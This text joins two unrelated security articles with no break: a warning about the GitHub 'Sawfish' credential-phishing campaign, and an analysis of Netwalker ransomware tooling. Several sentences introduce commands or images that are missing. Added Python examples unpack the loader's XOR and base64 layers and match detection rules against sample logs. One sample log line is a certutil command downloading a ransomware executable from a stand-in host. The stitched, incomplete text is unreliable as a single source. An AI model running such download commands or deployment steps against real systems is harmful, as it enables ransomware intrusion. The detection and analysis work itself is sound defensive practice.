GitHub users beware: online criminals have launched a phishing campaign to try and gain access to your accounts.
The Microsoft-owned source code collaboration and version control service reported the campaign, which it calls Sawfish, on Tuesday 14 April. Users were reporting emails that tried to lure them into entering their GitHub credentials on fake sites for a week before, it said.
The phishing campaign lures victims to domains that look similar to GitHub’s at first glance but which the company doesn’t own, such as git-hub.co, sso-github.com, and corp-github.com, the company said. Other domains misspell the ‘i’ in GitHub with an ‘l’, like glthub.info. The attacker also tried domains that look like those owned by other tech companies, such as aws-update.net and slack-app.net. Most of these domains are already down and the phisher has been swapping them out quickly, GitHub warned.
The phishing emails – which aren’t always well-written – try to raise the recipient’s alarm by suggesting that there’s something fishy going on with their account. One example, received on 4 April, asked a user to review their account activity:
It then took the user to this fake site, with a domain that GitHub says is associated with the Sawfish campaign:
The phishers appear to be targeting people based on the addresses used for public Git commits. These are updates to source code that are publicly viewable. That could explain one Redditor’s report of a phishing email sent to an address used exclusively for GitHub.
Attackers use several techniques to hide the real link destination, including URL shorteners, sometimes strung together to make it even more difficult to see the ultimate destination. They also use redirectors on compromised sites that have a legitimate-looking URL but which then send the victim to another malicious site.
Once the attacker gains access, they can download the contents of private repositories, which may be owned by the organizations they work for. They can also use GitHub OAuth tokens which authorize them to access the site for a predefined period even if the user changes their password. Alternatively, they could create a GitHub personal access token, which allows the user to access their GitHub account using the Security Assertion Markup Language (SAML). This is an open authentication standard often used for single sign-on (SSO) access. Setting up an SSH certificate to access a logged-in account is also trivial. If the victim of a phishing attack didn’t review their SSH certs, the attacker could continue accessing the account covertly for a long time.
The phishing attack even works against some kinds of two-factor authentication (2FA). One 2FA option that GitHub offers is a time-based one-time password (TOTP). This is a step up from SMS-based authentication, which attackers have subverted with SIM-jacking attacks. TOTP applications generate an authentication code that is valid for a certain time period, but the user still has to enter those codes into the authenticating website. The phishing site relays the TOTP code to the attacker, who then performs a man-in-the-middle attack and enters the TOTP code into GitHub.
The attack doesn’t work against hardware-based authentication systems based on WebAuthn, which GitHub began using in August 2019 as a second layer of authentication to complement TOTP codes. This includes a physical token that the attacker won’t have.
Why is this phishing campaign so important? Any phishing attack is a problem, but getting access to a GitHub user’s private repository could yield not only source code but keys to access online applications and SSH keys, along with login credentials for other online services. That’s bad enough for a private personal project, but could be devastating if the victim happens to have access to sensitive assets connected with a popular online app. That’s how hacker Kyle Milliken pwned Disqus.
What to do
Protect yourself by double-checking the destination site you end up at when following any emails, warned GitHub.
Use a password manager that will only enter your credentials into a domain that it recognizes, and get yourself a hardware security key that supports WebAuthn to access the site, it adds (which automatically means enabling 2FA).
Review the SSH keys used to access your GitHub account, verify your email addresses, and review your account’s security log to check for any phishy behaviour.
While investigating a malware campaign involving Netwalker ransomware, SophosLabs stumbled upon a set of files used by the criminals involved in the attacks. The trove of malware and related files reveals details about methods the attackers employed to compromise networks, elevate their privileges, and distribute the malware to workstations in very recent attacks.
In this blog, we’ll survey the collection and the insight it provides into this threat actor’s typical behavior. The tools included legitimate, publicly-available software (like TeamViewer), files cribbed from public code repositories (such as Github), and scripts (PowerShell) that appeared to have been created by the attackers themselves.
The Netwalker threat actor has struck a diverse set of targets based in the US, Australia, and western Europe, and recent reports indicate the attackers have decided to concentrate their efforts targeting large organizations, rather than individuals. The tooling we uncovered supports this hypothesis, as it includes programs intended to capture Domain Administrator credentials from an enterprise network, combined with orchestration tools that employ software distribution served from a Domain Controller, common in enterprise networks but rare among home users.
And while the bulk of the payloads were Netwalker, we also found individual samples of the Zeppelin Windows ransomware and the Smaug Linux ransomware as well.
What’s in a criminal’s toolbox

The archive contained at least 12 archived copies of the ransomware deployment package used by the threat actors, but also included a bonanza: a comprehensive set of tools used to perform reconnaissance on targeted networks; privilege-elevation and other exploits against Windows computers; and utilities that can steal, sniff, or brute-force their way to valuable information (including Mimikatz, and variants called Mimidogz and Mimikittenz, designed around avoiding detection by endpoint security) from a machine or network.
Some of the scripts and exploit tools were copied directly from Github repositories. Several of the tools are freely-available Windows utilities, such as Amplia Security’s Windows Credential Editor.
We also found a nearly complete set of the Microsoft SysInternals PsTools package, a copy of NLBrute (which attempts to brute-force passwords), installers for the commercial TeamViewer and AnyDesk remote support tools, and a number of utilities created by endpoint security vendors that are designed to remove their (and other companies’) endpoint security and antivirus tools from a computer.
Dissecting the break-in
It isn’t entirely clear how the threat actors behind this campaign gain an initial foothold into the networks they target, though there are hints they take advantage of well-known, heavily publicized vulnerabilities in widely used, outdated server software (such as Tomcat or Weblogic) or weak RDP passwords.
We found a brute-force tool called NLBrute, with configuration files that tell us it had been set up to use an included set of usernames and passwords to try to break into machines that have Remote Desktop enabled. NLBrute can be used in attacks targeting the perimeter, as well as a way to gain lateral access to other machines from a “foothold” in the network.
Once inside the network of their target, the attackers apparently use the SoftPerfect Network Scanner to identify and create target lists of computers with open SMB ports, and subsequently may have used Mimikatz, Mimidogz, or Mimikittenz to obtain credentials.
The files we recovered also revealed their preferred collection of exploits. Among them, we found variations on the EternalDarkness SMBv3 exploit (CVE-2020-0796), a CVE-2019-1458 local privilege exploit against Windows, the CVE-2017-0213 Windows COM privilege escalation exploit published on the Google Security Github account, and the CVE-2015-1701 “RussianDoll” privilege escalation exploit.
We also found the source code for the firefart variant of the pokemon exploit against the dirtycow vulnerability; that’s far too many ludicrous names for one Linux privilege escalation exploit. The attackers did not even bother modifying it from its default configured username value of firefart, either, but they may do that elsewhere.
In addition to exploits and hacking tools, the attackers have pulled together a ragtag collection of software designed to remove endpoint security and antivirus tools from Windows computers. Among the tools we found in their collection were AV Remover, published by ESET, and Trend Micro WorryFree Uninstall.
Ransomware delivery
The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation.
The script itself decodes and executes a large blob of base64-encoded text and converts it into a huge byte array. The script then decrypts that byte array (with a one-byte XOR algorithm) into a string, and then decodes another byte array out of this second array that normally (but not always) contains both a 32-bit and 64-bit version of the DLL, which it then loads into memory.
Here the array $dYtajKpwMqeYDr contains the 32-bit payload and $pLJPFgJtEVxJpXr the 64-bit payload. The starting MZ marker is replaced with 0xad 0xde in order to avoid suspicion (highlighted in green). It is not needed anyway, because the DLLs are not loaded by the operating system; the script implements all the necessary steps, without checking the MZ magic.
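As an added illustration, not code from the loader or from SophosLabs, this Python snippet reverses the layering described above on a constructed sample: base64 decoding, recovering the single-byte XOR key by searching for the 0xad 0xde marker that stands in for MZ, and restoring the header so the result can be checked against the PE signature that the loader itself never verifies. The key value, the minimal fake DLL and the single-layer layout are assumptions; real scripts wrap a further encoded stage around the 32-bit and 64-bit DLL pair.

```python
import base64
import struct

PATCHED_MAGIC = b"\xad\xde"  # the loader writes these two bytes where "MZ" belongs
SAMPLE_KEY = 0x5A            # constructed key for this sample; real scripts embed their own byte

def make_fake_dll() -> bytes:
    """Constructed minimal PE-like image: DOS header whose e_lfanew points at the PE signature."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew = 64, right after the DOS header
    return bytes(dos) + b"PE\0\0" + b"\x4c\x01" + b"\x00" * 30   # signature, x86 Machine, padding

def pack_like_loader(dll: bytes, key: int) -> str:
    """Apply the layers the loader undoes: patch MZ -> AD DE, single-byte XOR, base64."""
    patched = PATCHED_MAGIC + dll[2:]
    return base64.b64encode(bytes(b ^ key for b in patched)).decode()

def recover_xor_key(blob: bytes) -> int:
    """A one-byte key leaves only 256 candidates; the AD DE marker selects the right one."""
    for key in range(256):
        if bytes(b ^ key for b in blob[:2]) == PATCHED_MAGIC:
            return key
    raise ValueError("no single-byte XOR key yields the patched MZ marker")

def looks_like_pe(image: bytes) -> bool:
    """Check what the loader skips: an MZ header and a PE signature at e_lfanew."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    return image[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def unpack(b64_blob: str):
    """Return (key, restored image, pe_signature_ok) for one encoded stage."""
    blob = base64.b64decode(b64_blob)
    key = recover_xor_key(blob)
    plain = bytes(b ^ key for b in blob)
    restored = b"MZ" + plain[2:]                    # undo the AD DE substitution
    return key, restored, looks_like_pe(restored)

if __name__ == "__main__":
    key, image, ok = unpack(pack_like_loader(make_fake_dll(), SAMPLE_KEY))
    print(f"key=0x{key:02x} pe_ok={ok} size={len(image)}")
```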
Finally, the script deletes the shadow copies in preparation for the ransomware operations.
The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers’ payloads using psexec or certutil.
They apparently create a Domain Admin account named SQLSVC and give it the password Br4pbr4p (which also happens to be the password salt preconfigured in the dirtycow exploit script) and then leverage that account to perform a series of commands.
certutil is a Windows component that can download external content to the computer. In a typical attack, the criminals follow this paradigm:
The attackers sometimes issue this downloader command en masse to the targeted computers, which dutifully download the executable form of the Netwalker ransomware as a payload.
Alternatively, they distribute the ransomware executable within the targeted network themselves, in real time. The files we recovered indicate they do it by executing a script file, which uses the Sysinternals psexec tool to move laterally by trying to copy it to every machine they can reach:
The relevant psexec command line switches are:
So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response.
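As an added triage example, not from the article or its IOC list, this Python snippet runs three lookups over constructed process-creation records that correspond to the behaviours described above: certutil invoked with a URL, psexec launched against a remote host, and creation of the SQLSVC account mentioned earlier. It also groups hits per host so that the same download command landing on several machines (the "en masse" pattern) stands out. Hostnames, the reserved .invalid domain and the record layout are assumptions.

```python
import re

# Constructed process-creation records (host, user, command line); not taken from the article.
SAMPLE_EVENTS = [
    ("dc01", "CORP\\admin", r"C:\Windows\System32\net.exe user SQLSVC * /add /domain"),
    ("ws07", "CORP\\SQLSVC", "certutil.exe http://staging.invalid/nw.exe C:\\Temp\\nw.exe"),
    ("ws12", "CORP\\SQLSVC", "certutil.exe http://staging.invalid/nw.exe C:\\Temp\\nw.exe"),
    ("ws07", "CORP\\SQLSVC", r"psexec.exe \\ws12 C:\Temp\nw.exe"),
    ("ws03", "CORP\\jsmith", "certutil.exe -hashfile C:\\Tools\\setup.msi SHA256"),
    ("ws03", "CORP\\jsmith", r"powershell.exe -File C:\Scripts\backup.ps1"),
]

# Behaviours described in the article, expressed as command-line patterns.
RULES = [
    ("certutil remote download", re.compile(r"\bcertutil(\.exe)?\b.*https?://", re.I)),
    ("psexec remote execution", re.compile(r"\bpsexec(\.exe)?\s+\\\\\S+", re.I)),
    ("watched account creation", re.compile(r"\bnet(\.exe)?\s+user\s+SQLSVC\b.*\s/add\b", re.I)),
]

def triage(events):
    """Return (host, user, rule name) for every record that matches a rule."""
    findings = []
    for host, user, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append((host, user, name))
    return findings

def hosts_by_rule(findings):
    """Group affected hosts per rule; many hosts under the download rule is the mass-push pattern."""
    grouped = {}
    for host, _user, name in findings:
        grouped.setdefault(name, set()).add(host)
    return {name: sorted(hosts) for name, hosts in grouped.items()}

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for hit in hits:
        print(*hit)
    print(hosts_by_rule(hits))
```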
The attackers sometimes get a foothold within an organization, explore the network for a while, then distribute a PowerShell dropper for the ransomware.
They use batch files that leverage psexec, again, to push PowerShell loader scripts out to machines the network scanner finds on the internal network.
In both cases, the process ends with the Netwalker payload loaded and executed. The final malware is either a DLL or executable file.
The files on the target computer get encrypted and the user finds a ransom message like this one:
Each time they attacked a new victim organization, the attackers used a unique build of the Netwalker DLL. Oddly, many of the Netwalker DLLs have the same creation time in their PE header. In fact, the only difference between them is the encrypted blob stored in resource number 1337 or 31337. It seems likely that, most of the time, they use the same DLL template and only change this encrypted blob.
Conclusion
Ransomware attacks nowadays are not single-shot events like WannaCry was in 2017. The criminals have well-established procedures and toolsets they routinely use. The attacks are usually longer: attackers spend days (or even weeks) within the victim organizations, carefully mapping the internal network while gathering credentials and other useful information.
Our findings are a good example of a trend we have observed across the threat landscape. The criminals orchestrate well-designed manual attacks: they infiltrate and thoroughly reconnoitre the victim’s systems, then disable protection before delivering the final attack.
The threat actors behind the Netwalker ransomware rely less on self-made tools than other ransomware groups do. The largest part of the toolset consists of tools collected from the public domain. The use of these so-called grey hat applications saves them development time at the cost of originality.
Views like this one, directly into the attacker’s tactics and tooling, offer a rare glimpse behind the curtain that dramatically helps defenders prepare their defense against the early stages of an attack, before attackers can deliver their ransomware payloads.
IOCs
SophosLabs has published a list of indicators of compromise for samples acquired for this analysis on its Github page.
